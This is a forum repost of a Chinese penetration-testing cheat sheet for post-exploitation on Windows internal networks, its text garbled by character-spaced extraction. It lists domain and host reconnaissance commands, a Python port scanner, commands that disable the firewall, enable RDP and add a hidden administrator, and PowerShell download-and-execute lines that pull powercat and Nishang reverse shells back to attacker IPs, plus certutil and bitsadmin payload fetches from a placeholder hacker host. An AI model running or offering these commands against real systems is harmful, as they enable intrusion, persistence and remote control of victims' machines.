搜索

[22282] 2021-08-23_干货Windows内网渗透信息搜集命令汇总

文档创建者:s7ckTeam
浏览次数:46
最后更新:2025-01-18
2021-08-23_干货Windows内网渗透信息搜集命令汇总 | W i n d o w s C o n s T 2 7   L e m o n S e c   2 0 2 1 - 0 8 - 2 3 i p c o n f i g   / a l l w m i c   s e r v i c e   l i s t   b r i e f s y s t e m i n f o t a s k l i s t   /   w m i c   p r o c e s s   l i s t   b r i e f
s c h t a s k s   / q u e r y   / f o   L I S T   / v   n e t   s t a t i s t i c s   w o r k s t a t i o n n e t   u s e r   n e t   l o c a l g r o u p   a d m i n i s t r a t o r s   n e t s t a t   - a n o
w m i c   q f e   g e t   C a p t i o n , D e s c r i p t i o n , H o t F i x I D , I n s t a l l e d O n n e t   s h a r e   访 w m i c   s h a r e   g e t   n a m e , p a t h , s t a t u s   a r p r o u t e   p r i n t   a r p   - a   a r p n e t s h   f i r e w a l l   s e t   o p m o d e   d i s a b l e   ( W i n d o w s   S e r v e r   2 0 0 3   ) n e t s h   a d v f i r e w a l l   s e t   a l l p r o f i l e s   s t a t e   o f f   ( W i n d o w s   S e r v e r   2 0 0 3   ) n e t s h   f i r e w a l l   s h o w   c o n f i g   使 n e t s h   a d v f i r e w a l l   f i r e w a l l   s h o w   r u l e   n a m e = a l l 使 w m i c h t t p : / / w w w . f u z z y s e c u r i t y . c o m / s c r i p t s / f i l e s / w m i c _ i n f o . r a r w h o a m i   / a l l   n e t   u s e r   x x x   / d o m a i n   . n e t   t i m e   / d o m a i n   5 n e t   c o n f i g   w o r k s t a t i o n
n s l o o k u p   - t y p e = s r v   _ l d a p . _ t c p I P 1 . 使   n b t s c a n   h t t p : / / w w w . u n i x w i z . n e t / t o o l s / n b t s c a n . h t m l 2 . a r p a r p   - a 3 . I C M P p i n g
C O D E f o r   / L   % I   i n   ( 1 , 1 , 2 5 4 )   D O   @ p i n g   - w   1   - n   1   1 9 2 . 1 6 8 . 1 . % I   |   f i n d s t r   " T T L " 4 . n m a p 5 . m e t e r p r e t e r   r u n   w i n d o w s / g a t h e r / e n u m _ a d _ c o m p u t e r s 1 . n m a p n m a p   1 9 2 . 1 6 8 . 1 . 0 / 2 4 2 .   S 3 . C O D E # p y t h o n 3   i m p o r t   s o c k e t d e f   g e t _ i p _ s t a t u s ( i p , p o r t ) :         s e r v e r   =   s o c k e t . s o c k e t ( s o c k e t . A F _ I N E T ,   s o c k e t . S O C K _ S T R E A M )         t r y :                 s e r v e r . c o n n e c t ( ( i p , p o r t ) )                 p r i n t ( ' { 0 }   p o r t   { 1 }   i s   o p e n ' . f o r m a t ( i p ,   p o r t ) )         e x c e p t   E x c e p t i o n   a s   e r r :                 p r i n t ( ' { 0 }   p o r t   { 1 }   i s   n o t   o p e n ' . f o r m a t ( i p , p o r t ) )         f i n a l l y :                 s e r v e r . c l o s e ( ) i f   _ _ n a m e _ _   = =   ' _ _ m a i n _ _ ' :         h o s t   =   ' 1 7 2 . 1 6 . 0 . 1 9 8 '         f o r   p o r t   i n   r a n g e ( 2 0 , 1 0 0 ) :                 g e t _ i p _ s t a t u s ( h o s t , p o r t ) n e t   g r o u p   d o m a i n   c o m p u t e r s   / d o m a i n   n e t   v i e w   / d o m a i n : H A C H E  
n e t   a c c o u n t s   / d o m a i n   n l t e s t   / d o m a i n _ t r u s t s   n l t e s t   / D C L I S T : h a c k e   N s l o o k u p   - t y p e = S R V _ l d a p . _ t c p   n e t   u s e r   / d o m a i n   w m i c   u s e r a c c o u n t   g e t   / a l l   n e t   l o c a l g r o u p   a d m i n i s t r a t o r s   n e t   g r o u p   d o m a i n   a d m i n s   / d o m a i n   n e t   g r o u p   E n t e r p r i s e   a d m i n s   / d o m a i n   w m i c o r W M I C   / n a m e s p a c e : r o o t s e c u r i t y c e n t e r 2   p a t h   a n t i v i r u s p r o d u c t   G E T   d i s p l a y N a m e , p r o d u c t S t a t e ,   p a t h T o S i g n e d P r o d u c t E x e 3 3 8 9 R E G   A D D   H K L M S Y S T E M C u r r e n t C o n t r o l S e t C o n t r o l T e r m i n a l   S e r v e r   / v   f D e n y T S C o n n e c t i o n s   / t   R E G _ D W O R D   / d   0   / f n e t   u s e r   u s e r n a m e   p a s s w o r d   / a d d   n e t   l o c a l g r o u p   a d m i n i s t r a t o r s   u s e r n a m e   / a d d   X X W i n d o w s   s h e l l C O D E p o w e r s h e l l   I E X   ( N e w - O b j e c t   S y s t e m . N e t . W e b c l i e n t ) . D o w n l o a d S t r i n g ( ' h t t p s : / / r a w . g i t h u b u s e r c o n t e n t . c o m / b e s i m o r h i n o / p o w e r c a t / m a s t e r / p o w e r c a t . p s 1 ' ) ;   p o w e r c a t   - c   1 9 2 . 1 6 8 . 1 . 4   - p   9 9 9 9   - e   c m d p o w e r s h e l l   I E X   ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( ' h t t p s : / / r a w . g i t h u b u s e r c o n t e n t . c o m / s a m r a t a s h o k / n i s h a n g / 9 a 3 c 7 4 7 b c f 5 3 5 e f 8 2 d c 4 c 5 c 6 6 a a c 3 6 d b 4 7 c 2 a f d e / S h e l l s / I n v o k e - P o w e r S h e l l T c p . p s 1 ' ) ; I n v o k e - P o w e r S h e l l T c p   - R e v e r s e - I P A d d r e s s   1 9 2 . 1 6 8 . 2 0 3 . 1 4 0   - p o r t   6 6 6 6 w m i c   W M I C   / N o d e : l o c a l h o s t   / N a m e s p a c e : r o o t S e c u r i t y C e n t e r 2   P a t h   A n t i V i r u s P r o d u c t   G e t   d i s p l a y N a m e   / F o r m a t : L i s t
C O D E W M I C   / n a m e s p a c e : r o o t s e c u r i t y c e n t e r 2   p a t h   a n t i v i r u s p r o d u c t   G E T   d i s p l a y N a m e , p r o d u c t S t a t e ,   p a t h T o S i g n e d P r o d u c t E x e W M I C   / N o d e : l o c a l h o s t   / N a m e s p a c e : r o o t S e c u r i t y C e n t e r 2   P a t h   A n t i V i r u s P r o d u c t   G e t   d i s p l a y N a m e   / F o r m a t : L i s t 3 3 8 9 C O D E R E G   A D D   H K L M S Y S T E M C u r r e n t C o n t r o l S e t C o n t r o l T e r m i n a l "   " S e r v e r   / v   f D e n y T S C o n n e c t i o n s   / t   R E G _ D W O R D   / d   0 0 0 0 0 0 0 0   / f w m i c   R D T O G G L E   W H E R E   S e r v e r N a m e = ' % C O M P U T E R N A M E % '   c a l l   S e t A l l o w T S C o n n e c t i o n s   1 w m i c   / n a m e s p a c e : r o o t c i m v 2 t e r m i n a l s e r v i c e s   p a t h   w i n 3 2 _ t s g e n e r a l s e t t i n g   w h e r e   ( T e r m i n a l N a m e   = ' R D P - T c p ' )   c a l l   s e t u s e r a u t h e n t i c a t i o n r e q u i r e d   0 h t t p s : / / b l o g . c s d n . n e t / w e i x i n _ 3 9 9 9 7 8 2 9 / a r t i c l e / d e t a i l s / 9 2 6 6 6 5 5 2 c m d C O D E b i t s a d m i n   / t r a n s f e r   n   h t t p : / / w w w . x x . c o m / c o d e . j p g   c : u s e r s s d y p d e s k t o p f f . j p g C : T e m p > c e r t u t i l . e x e   - u r l c a c h e   - s p l i t   - f   " h t t p s : / / h a c k e r s . h o m e / b a d c o n t e n t . t x t "   b a d . t x t C : T e m p > c e r t u t i l . e x e   - d e c o d e   b a d . t x t   b a d . e x e C O D E w m i c   l o g i c a l d i s k   w h e r e   d r i v e t y p e = 3   g e t   d e v i c e i d
p s   c s   线 线 C O D E p o w e r s h e l l . e x e   - c   I E X ( ( n e w - o b j e c t   n e t . w e b c l i e n t ) . d o w n l o a d s t r i n g ( ' h t t p : / / x x x / a . p s 1 ' ) ) p o w e r s h e l l   - e x e c   b y p a s s   - c   " ( N e w - O b j e c t   N e t . W e b C l i e n t ) . P r o x y . C r e d e n t i a l s = [ N e t . C r e d e n t i a l C a c h e ] : : D e f a u l t N e t w o r k C r e d e n t i a l s ; i w r ( ' h t t p : / / w e b s e r v e r / p a y l o a d . p s 1 ' ) | i e x " p o w e r s h e l l   - e x e c   b y p a s s   - f   w e b d a v s e r v e r f o l d e r p a y l o a d . p s 1       ( s m b ) S R C C S A p a c h e   T o m c a t     W A R     h a s h h a s h ( 使 ) w e b l o g i c   s p r i n g L e m o n S e c C o n s T 2 7 C o n s T 2 7 ' s   B l o g
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理